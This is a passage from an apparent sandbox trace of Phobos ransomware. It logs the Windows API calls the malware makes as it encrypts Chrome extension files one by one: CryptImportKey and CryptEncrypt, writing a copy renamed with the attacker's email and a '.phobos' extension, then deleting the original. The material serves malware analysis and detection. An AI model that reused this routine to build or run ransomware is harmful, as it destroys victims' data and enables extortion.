data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.335] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=273) returned 1 [0151.335] CloseHandle (hObject=0x138) returned 1 [0151.335] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json")) returned 0x2020 [0151.335] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.335] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.335] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.336] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.336] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.336] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x111, lpOverlapped=0x0) returned 1 [0151.336] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0151.337] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0151.337] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.337] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.337] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.337] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.337] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.338] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.338] CloseHandle (hObject=0x138) returned 1 [0151.338] CloseHandle (hObject=0x130) returned 1 [0151.338] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json")) returned 1 [0151.339] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.339] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=267) returned 1 [0151.339] CloseHandle (hObject=0x130) returned 1 [0151.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json")) returned 0x2020 [0151.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.339] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.339] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.341] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.341] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.341] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x10b, lpOverlapped=0x0) returned 1 [0151.342] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.342] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.343] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.343] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.343] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.343] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.343] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.343] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.343] CloseHandle (hObject=0x130) returned 1 [0151.344] CloseHandle (hObject=0x138) returned 1 [0151.344] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json")) returned 1 [0151.345] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.345] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=11221) returned 1 [0151.346] CloseHandle (hObject=0x138) returned 1 [0151.346] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json")) returned 0x2020 [0151.346] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.346] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.346] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.347] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.347] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2bd5, lpOverlapped=0x0) returned 1 [0151.688] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2be0, dwBufLen=0x2be0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2be0) returned 1 [0151.689] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2be0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2be0, lpOverlapped=0x0) returned 1 [0151.690] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0151.690] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.690] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0151.690] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.690] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0151.690] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.690] CloseHandle (hObject=0x138) returned 1 [0151.690] CloseHandle (hObject=0x130) returned 1 [0151.691] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json")) returned 1 [0151.691] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.692] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=728) returned 1 [0151.692] CloseHandle (hObject=0x130) returned 1 [0151.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json")) returned 0x2020 [0151.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.692] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.692] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.693] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.693] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.693] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2d8, lpOverlapped=0x0) returned 1 [0151.740] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2e0, dwBufLen=0x2e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2e0) returned 1 [0151.740] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2e0, lpOverlapped=0x0) returned 1 [0151.741] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.741] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.741] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.741] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.741] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.741] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.741] CloseHandle (hObject=0x130) returned 1 [0151.741] CloseHandle (hObject=0x138) returned 1 [0151.741] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json")) returned 1 [0151.742] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.742] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.742] CloseHandle (hObject=0x138) returned 1 [0151.742] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json")) returned 0x2020 [0151.742] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.743] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.743] 